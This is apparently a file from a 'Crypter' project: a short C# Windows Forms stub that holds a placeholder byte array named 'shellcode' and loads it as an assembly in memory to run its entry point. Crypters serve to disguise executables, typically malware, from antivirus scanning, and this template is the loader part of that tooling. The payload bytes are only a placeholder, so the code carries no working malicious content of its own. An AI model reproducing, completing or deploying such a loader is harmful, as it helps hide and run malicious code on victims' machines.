Crypter/Crypter/Resources/PEbytes.txt

28 lines
551 B
Plaintext

using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Reflection;
namespace WindowsFormsApp
{
static class Program
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
byte[] shellcode = new byte[654321]
{
123456
};
Assembly.Load(shellcode).EntryPoint.Invoke(null, null);
}
}
}